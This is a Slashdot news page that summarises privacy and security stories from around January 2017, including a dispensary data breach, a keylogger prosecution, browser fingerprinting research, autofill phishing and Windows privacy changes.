Check out the new SourceForge HTML5 internet speed test! No Flash necessary and runs on all devices. ×
Privacy

Hackers Corrupt Data For Cloud-Based Medical Marijuana System (bostonglobe.com) 112

Long-time Slashdot reader t0qer writes: I'm the IT director at a medical marijuana dispensary. Last week the point of sales system we were using was hacked... What scares me about this breach is, I have about 30,000 patients in my database alone. If this company has 1,000 more customers like me, even half of that is still 15 million people on a list of people that "Smoke pot"...
" No patient, consumer, or client data was ever extracted or viewed," the company's data directory has said. "The forensic analysis proves that. The data was encrypted -- so it couldn't have been viewed -- and it was never extracted, so nobody has it and could attempt decryption." They're saying it was a "targeted" attack meant to corrupt the data rather than retrieve it, and they're "reconstructing historical data" from backups, though their web site adds that their backup sites were also targeted.

"In response to this attack, all client sites have been migrated to a new, more secure environment," the company's CEO announced on YouTube Saturday, adding that "Keeping our client's data secure has always been our top priority." Last week one industry publication had reported that the outage "has sent 1,000 marijuana retailers in 23 states scrambling to handle everything from sales and inventory management to regulatory compliance issues."
Security

Student Hacker Faces 10 Years in Prison For Spyware That Hit 16,000 Computers (vice.com) 169

An anonymous reader quotes Motherboard: A 21-year-old from Virginia plead guilty on Friday to writing and selling custom spyware designed to monitor a victim's keystrokes. Zachary Shames, from Great Falls, Virginia, wrote a keylogger, malware designed to record every keystroke on a computer, and sold it to more than 3,000 people who infected more than 16,000 victims with it, according to a press release from the U.S. Department of Justice.

Shames, who appears to be a student at James Madison University, developed the first version of the spyware while he was still a high school student in 2013, "and continued to modify and market the illegal product from his college dorm room," according to the feds... While the feds only vaguely referred to it as "some malicious keylogger software," it appears the spyware was actually called "Limitless Keylogger Pro," according to evidence found by a security researcher who asked to remain anonymous... According to what appears to be Shames Linkedin page, he was an intern for the defense contractor Northrop Grumman from May 2015 until August 2016.

The Department of Justice announced that he'll be sentenced on June 16, and faces a maximum of 10 years in prison.
Privacy

Tor Onion Browser's Creator Explains Free Version For iOS (mike.tig.as) 25

The free iOS version of the Tor browser "sparked a tidal wave of interest" after its release in December, according to Silicon.co. Mickeycaskill writes: The cost has been scrapped due to developer Mike Tigas' worries that the price was limiting access to anonymous browsing for those who need it most. "Given recent events, many believe it's more important than ever to exercise and support freedom of speech, privacy rights, and digital security," Tigas wrote in a blog post. "I think now is as good a time as ever to make Onion Browser more accessible to everyone."
"I'm still a little terrified that I've made this change," Tigas adds. For four years the Tor Onion browser was available on the Apple App Store for $0.99, the lowest non-free price allowed by Apple, providing a "reliable" income to Tigas which helped him move to New York for a new job while allowing him "the economic freedom to continue working on side projects that have a positive impact in the world." Tigas also writes that "there's now a Patreon page and other ways to support the project."

Last month the Tor Project also released the first alpha version of the sandboxed Tor Browser.
Government

Petition With Over 1 Million Signatures Urges President Obama To Pardon Snowden (cnet.com) 260

An anonymous reader quotes a report from CNET: More than 1 million people signed onto a petition asking President Barack Obama to pardon Edward Snowden, proponents of the pardon said Friday. The campaign began in September, when Snowden, his attorney Ben Wizner from the ACLU, and other privacy activists announced they would formally petition Obama for a pardon. Snowden leaked classified NSA documents detailing surveillance programs run by the U.S. and its allies to journalists in 2013, kicking off a heated debate on whether Americans should be willing to sacrifice internet privacy to help the government protect the country from terrorist attacks. Obama and White House representatives have said repeatedly that Snowden must face the charges against him and that he'll be afforded a fair trial. In the U.S., a pardon is "an expression of the president's forgiveness and ordinarily is granted in recognition of the applicant's acceptance of responsibility for the crime and established good conduct for a significant period of time after conviction or completion of sentence," according to the Office of the Pardon Attorney. It does not signify innocence. Also on Friday, David Kaye urged Obama to consider a pardon for Snowden. Kaye, the special rapporteur to the United Nations Human Rights Council on the freedom of expression, said U.S. law doesn't allow Snowden to argue that his disclosures were made for the benefit of the public. The jury would merely be asked to decide whether Snowden stole government secrets and distributed them -- something Snowden himself concedes he did. In response to the petition, Edward Snowden tweeted: "Whether or not this President ends the war on whistleblowers, you've sent a message to history: I feared no one would care. I was wrong."
Republicans

Trump's Cyber Security Advisor Rudy Giuliani Runs Ancient, Utterly Hackable Website (theregister.co.uk) 270

mask.of.sanity writes from a report via The Register: U.S. president-elect Donald Trump's freshly minted cyber tsar Rudy Giuliani runs a website so insecure that its content management system is five years out of date, unpatched and is utterly hackable. Giulianisecurity.com, the website for Giuliani's eponymous infosec consultancy firm, runs Joomla! version 3.0, released in 2012, and since found to carry 15 separate vulnerabilities. More bugs and poor secure controls abound. The Register report adds: "Some of those bugs can be potentially exploited by miscreants using basic SQL injection techniques to compromise the server. This seemingly insecure system also has a surprising number of network ports open -- from MySQL and anonymous LDAP to a very out-of-date OpenSSH 4.7 that was released in 2007. It also runs a rather old version of FreeBSD. 'You can probably break into Giuliani's server,' said Robert Graham of Errata Security. 'I know this because other FreeBSD servers in the same data center have already been broken into, tagged by hackers, or are now serving viruses. 'But that doesn't matter. There's nothing on Giuliani's server worth hacking.'"
Security

Security Experts Rebut The Guardian's Report That Claimed WhatsApp Has a Backdoor (gizmodo.com) 110

William Turton, writing for Gizmodo: This morning, the Guardian published a story with an alarming headline: "WhatsApp backdoor allows snooping on encrypted messages." If true, this would have massive implications for the security and privacy of WhatsApp's one-billion-plus users. Fortunately, there's no backdoor in WhatsApp, and according to Alec Muffett, an experienced security researcher who spoke to Gizmodo, the Guardian's story is a "major league fuckwittage." [...] Fredric Jacobs, who was the iOS developer at Open Whisper Systems, the collective that designed and maintains the Signal encryption protocol, and who most recently worked at Apple, said, "Nothing new. Of course, if you don't verify keys Signal/WhatsApp/... can man-in-the-middle your communications." "I characterize the threat posed by such reportage as being fear and uncertainty and doubt on an 'anti-vaccination' scale," Muffett, who previously worked on Facebook's engineering security infrastructure team, told Gizmodo. "It is not a bug, it is working as designed and someone is saying it's a 'flaw' and pretending it is earth shattering when in fact it is ignorable." The supposed "backdoor" the Guardian is describing is actually a feature working as intended, and it would require significant collaboration with Facebook to be able to snoop on and intercept someone's encrypted messages, something the company is extremely unlikely to do. "There's a feature in WhatsApp that -- when you swap phones, get a new phone, factory reset, whatever -- when you install WhatsApp freshly on the new phone and continue a conversation, the encryption keys get re-negotiated to accommodate the new phone," Muffett told Gizmodo. Other security experts and journalists have also criticized The Guardian's story.
Privacy

Switzerland Agrees To Its Own New Data Sharing Pact With the US (silicon.co.uk) 15

Mickeycaskill quotes a report from Silicon.co.uk: Switzerland has agreed its own new data transfer agreement with the United States, basing the framework on the deal struck by the European Union (EU) following the invalidation of Safe Harbour. The previous arrangement was invalidated because of concerns about U.S. mass surveillance but Switzerland says the new Swiss-U.S. Privacy Shield will allow Swiss companies to transfer customer data without the need for additional contractual guarantees. The Swiss Federal Council, a seven member executive council that is effectively the head of government in Switzerland, claim citizens will benefit from additional protections and the ability to contact an ombudsman about data issues. Although not part of the EU, Switzerland is a member of the European Economic Area (EEA) and has several bilateral agreements with the EU that sees it adopt many of the bigger bloc's policies. The Federal Council says the alignment between the EU and the Swiss transatlantic data sharing partnerships is good news for multinational organizations.
Privacy

Fingerprinting Methods Identify Users Across Different Browsers On the Same PC (bleepingcomputer.com) 88

An anonymous reader quotes a report from BleepingComputer: A team of researchers from universities across the U.S. has identified different fingerprinting techniques that can track users when they use different browsers installed on the same machine. Named "cross-browser fingerprinting" (CBF), this practice relies on new technologies added to web browsers in recent years, some of which had been previously considered unreliable for cross-browser tracking and only used for single browser fingerprinting. These new techniques rely on making browsers carry out operations that use the underlying hardware components to process the desired data. For example, making a browser apply an image to the side of a 3D cube in WebGL provides a similar response in hardware parameters for all browsers. This is because the GPU card is the one carrying out this operation and not the browser software. According to the three-man research team led by Assistant Professor Yinzhi Cao from the Computer Science and Engineering Department at Lehigh University, the following browser features could be (ab)used for cross-browser fingerprinting operations: [Screen Resolution, Number of CPU Virtual Cores, AudioContext, List of Fonts, Line, Curve, and Anti-Aliasing, Vertex Shader, Fragment Shader, Transparency via Alpha Channel, Installed Writing Scripts (Languages), Modeling and Multiple Models, Lighting and Shadow Mapping, Camera and Clipping Planes.] Researchers used all these techniques together to test how many users they would be able to pin to the same computer. For tests, researchers used browsers such as Chrome, Firefox, Edge, IE, Opera, Safari, Maxthon, UC Browser, and Coconut. Results showed that CBF techniques were able to correctly identify 99.24% of all test users. Previous research methods achieved only a 90.84% result.
Government

Obama Changed Rules Regarding Raw Intelligence, Allowing NSA To Share Raw Data With US's Other 16 Intelligence Agencies (schneier.com) 197

An anonymous reader quotes a report from Schneier on Security: President Obama has changed the rules regarding raw intelligence, allowing the NSA to share raw data with the U.S.'s other 16 intelligence agencies. The new rules significantly relax longstanding limits on what the N.S.A. may do with the information gathered by its most powerful surveillance operations, which are largely unregulated by American wiretapping laws. These include collecting satellite transmissions, phone calls and emails that cross network switches abroad, and messages between people abroad that cross domestic network switches. The change means that far more officials will be searching through raw data. Essentially, the government is reducing the risk that the N.S.A. will fail to recognize that a piece of information would be valuable to another agency, but increasing the risk that officials will see private information about innocent people. Here are the new procedures. This rule change has been in the works for a while. Here are two blog posts from April discussing the then-proposed changes.
Privacy

Japan Researchers Warn of Fingerprint Theft From 'Peace' Sign (phys.org) 119

Tulsa_Time quotes a report from Phys.Org: Could flashing the "peace" sign in photos lead to fingerprint data being stolen? Research by a team at Japan's National Institute of Informatics (NII) says so, raising alarm bells over the popular two-fingered pose. Fingerprint recognition technology is becoming widely available to verify identities, such as when logging on to smartphones, tablets and laptop computers. But the proliferation of mobile devices with high-quality cameras and social media sites where photographs can be easily posted is raising the risk of personal information being leaked, reports said. The NII researchers were able to copy fingerprints based on photos taken by a digital camera three meters (nine feet) away from the subject.
Chrome

Latest Adobe Acrobat Reader Update Silently Installs Chrome Extension (bleepingcomputer.com) 144

An anonymous reader writes: The latest Adobe Acrobat Reader security update (15.023.20053), besides delivering security updates, also secretly installs the Adobe Acrobat extension in the user's Chrome browser. There is no mention of this "special package" on Acrobat's changelog, and surprise-surprise, the extension comes with anonymous data collection turned on by default. Bleeping Computer reports: "This extension allows users to save any web page they're on as a PDF file and share it or download it to disk. The extension is also Windows-only, meaning Mac and Linux Chrome users will not receive it. The extension requests the following permissions: Read and change all your data on the websites you visit; Manage your downloads; Communicate with cooperating native applications. According to Adobe, extension users 'share information with Adobe about how [they] use the application. The information is anonymous and will help us improve product quality and features,' Adobe also says. 'Since no personally identifiable information is collected, the anonymous data will not be meaningful to anyone outside of Adobe.'"
Medicine

Microsoft Anti-Porn Workers Sue Over PTSD (thedailybeast.com) 297

An anonymous reader shares with us a report from The Daily Beast: When former Microsoft employees complained of the horrific pornography and murder films they had to watch for their jobs, the software giant told them to just take more smoke breaks, a new lawsuit alleges. Members of Microsoft's Online Safety Team had "God-like" status, former employees Henry Soto and Greg Blauert allege in a lawsuit filed on Dec. 30. They "could literally view any customer's communications at any time." Specifically, they were asked to screen Microsoft users' communications for child pornography and evidence of other crimes. But Big Brother didn't offer a good health care plan, the Microsoft employees allege. After years of being made to watch the "most twisted" videos on the internet, employees said they suffered severe psychological distress, while the company allegedly refused to provide a specially trained therapist or to pay for therapy. The two former employees and their families are suing for damages from what they describe as permanent psychological injuries, for which they were denied worker's compensation. "Microsoft applies industry-leading, cutting-edge technology to help detect and classify illegal images of child abuse and exploitation that are shared by users on Microsoft Services," a Microsoft spokesperson wrote in an email. "Once verified by a specially trained employee, the company removes the image, reports it to the National Center for Missing and Exploited Children, and bans the users who shared the images from our services. We have put in place robust wellness programs to ensure the employees who handle this material have the resources and support they need." But the former employees allege neglect at Microsoft's hands.
Security

Windows 10 Will Soon Lock Your PC When You Step Away From It (theverge.com) 172

An anonymous reader quotes a report from The Verge: Microsoft is working on a new Windows 10 feature that will automatically lock and secure a PC when the operating system detects someone has moved away from the machine. The feature is labelled as Dynamic Lock in recent test builds of Windows 10, and Windows Central reports that Microsoft refers to this as "Windows Goodbye" internally. Microsoft currently uses special Windows Hello cameras to let Windows 10 users log into a PC with just their face. Big corporations teach employees to use the winkey+L combination to lock machines when they're idle, but this new feature will make it an automatic process. It's not clear exactly how Microsoft will detect inactivity, but it's possible the company could use Windows Hello-compatible machines or detect idle activity and lock the machine accordingly. Windows can already be configured to do this after a set time period, but it appears Microsoft is streamlining this feature into a simple setting for anyone to enable. Microsoft is planning to deliver Dynamic Lock as part of the Windows 10 Creators Update, expected to arrive in April.
Microsoft

Microsoft To Enhance User Privacy Controls In Upcoming Windows 10 Update (hothardware.com) 183

MojoKid writes: When Microsoft first launched Windows 10, it was generally well-received but also came saddled with a number of privacy concerns. It has taken quite a while for Microsoft to respond to these concerns in a meaningful way, but the company is finally proving that it's taking things seriously by detailing some enhanced privacy features coming to a future Windows 10 build. Microsoft is launching what it calls a (web-based) privacy dashboard, which lets you configure anything and everything about information that might be sent to back to the mothership. You can turn all tracking off, or pick and choose, if certain criteria don't concern you too much, like location or health activity, for example. Also, for fresh installs, you'll be given more specific privacy options so that you can feel confident from the get-go about the information you're sending Redmond's way. If you do decide to send any information Microsoft's way, the company promises that it won't use your information for the sake of targeted advertising.
Privacy

WhatsApp, Gmail Roped Into Tougher EU Privacy Proposal (reuters.com) 36

Online messaging and email services such as WhatsApp, iMessage and Gmail will face tough new rules on how they can track users under a proposal presented by the European Union executive on Tuesday. From a report: The web players will have to guarantee the confidentiality of their customers' conversations and ask for their consent before tracking them online to serve them personalized ads. The proposal by the European Commission extends some rules that now only apply to telecom operators to web companies offering calls and messages using the internet, known as "Over-The-Top" (OTT) services, seeking to close a perceived regulatory gap between the telecoms industry and mainly U.S. Internet giants such as Facebook, Google and Microsoft.
Microsoft

Ask Slashdot: What Is the Best Way To Thank Users For Reporting Security Issues? 128

An anonymous Slashdot reader writes: I have worked in the IT field long enough to know that many issues can be avoided if users pay attention to pop-ups, security alerts, "from" addresses et al and not just machine gun click their way through things. Unfortunately, most users seem to have the "fuck it" mentality in terms of good security practices. Sometimes I will have users submit a ticket asking if an email is safe to open or if that strange 800 number that popped up in their browser is really Microsoft. When that happens I like to talk to them in person (when possible) to commend them and tell them how much trouble could be avoided if more users followed their example. I'm curious to know if anyone has ever worked somewhere with bug bounty type incentives for corporate users or if you have a unique way of thanking people for not trying to open Urgent_Invoice.exe.
Privacy

Lawyer Rewrites Instagram's Privacy Policy So Kids and Parents Can Have a Meaningful Talk About Privacy (qz.com) 95

Kids, of age between 12 and 15, are increasingly joining Facebook's Instagram service, but according to a research, they likely don't even understand what they are signing up for. Jenny Afia, a privacy law expert at Schillings, a UK-based law firm, rewrote Instagram's terms of service in child-friendly language, so that not only the kids but their parents are able to understand what things are at stake. Highlighted are the changes the lawyer has made: Officially you own any original pictures and videos you post, but we are allowed to use them, and we can let others use them as well, anywhere around the world. Other people might pay us to use them and we will not pay you for that. [...] We may keep, use and share your personal information with companies connected with Instagram. This information includes your name, email address, school, where you live, pictures, phone number, your likes and dislikes, where you go, who your friends are, how often you use Instagram, and any other personal information we find such as your birthday or who you are chatting with, including in private messages (DMs). [...] We might send you adverts connected to your interests which we are monitoring. You cannot stop us doing this and it will not always be obvious that it is an advert.
Movies

IMDb Ignores New Law Banning It From Publishing Actors' Ages Online, Cites Free Speech Violations (betanews.com) 217

Back in September, the state of California passed a new law that banned sites that offer paid subscriptions, and allow people to post resumes, from publishing individuals' ages. It's a law that has the potential to affect many sites, but it is the Internet Movie Database (IMDb) that hit the headlines. From a report: IMDb was told to remove actors' ages from the site by 1 January, 2017, but the site has failed to take any action. A full week into 2017, IMDb has not only chosen to ignore the new law, but has also filed a lawsuit in a bid to stop California from implementing Assembly Bill No. 1687. The reason? IMDb believes that the law is a violation of the First Amendment and it says the state has "chosen instead to chill free speech and to undermine access to factual information of public interest" rather than trying to tackle age-discrimination in a more meaningful way.
Mozilla

Browser Autofill Profiles Can Be Abused For Phishing Attacks (bleepingcomputer.com) 112

An anonymous reader quotes Bleeping Computer: Browser autofill profiles are a reliable phishing vector that allow attackers to collect information from users via hidden form fields, which the browser automatically fills with preset personal information and which the user unknowingly sends to the attacker when he submits a form... Finnish web developer Viljami Kuosmanen has published a demo on GitHub... A user looking at this page will only see a Name and Email input field, along with a Submit button. Unless the user looks at the page's source code, he won't know that the form also contains six more fields named Phone, Organization, Address, Postal Code, City, and Country. If the user has an autofill profile set up in his browser, if he decides to autofill the two visible fields, the six hidden fields will be filled in as well, since they're part of the same form, even if invisible to the user's eye.

Browsers that support autofill profiles are Google Chrome, Safari, and Opera. Browsers like Edge, Vivaldi, and Firefox don't support this feature, but Mozilla is currently working on a similar feature.

Operating Systems

Richard Stallman Acknowledges Libreboot Is No Longer A Part of GNU (gnu.org) 393

Libreboot became an official GNU project in May. Now an anonymous Slashdot reader writes: Richard Stallman has officially announced that Libreboot is no longer a GNU package. The maintainer of Libreboot had tried to leave the GNU project in September 2016, but the departure was not acknowledged until January 2017. Libreboot is a replacement for proprietary BIOS systems, effectively a distribution of coreboot without any binary blobs and adding an automated build/install process.
In the post titled "Goodbye to GNU Libreboot," Stallman wrote that "When a package's maintainer steps down, that doesn't by itself break the relationship between GNU and the package. If it is left without a maintainer but is still useful, the GNU Project will usually look for new maintainers to work on it. However, we can instead drop ties with the package, if that seems the right thing to do.

"A few months ago, the maintainer of GNU Libreboot decided not to work on Libreboot for the GNU Project any more. That was her decision to make. She also asserted that Libreboot was no longer a GNU package -- something she could not unilaterally do. The GNU Project had to decide what to do in regard to Libreboot. We have decided to go along with the former GNU maintainer's wishes in this case, for a combination of reasons: (1) it had not been a GNU package for very long, (2) she was the developer who had originally made it a GNU package, and (3) there were no major developers who wanted to continue developing Libreboot under GNU auspices."

Slashdot Top Deals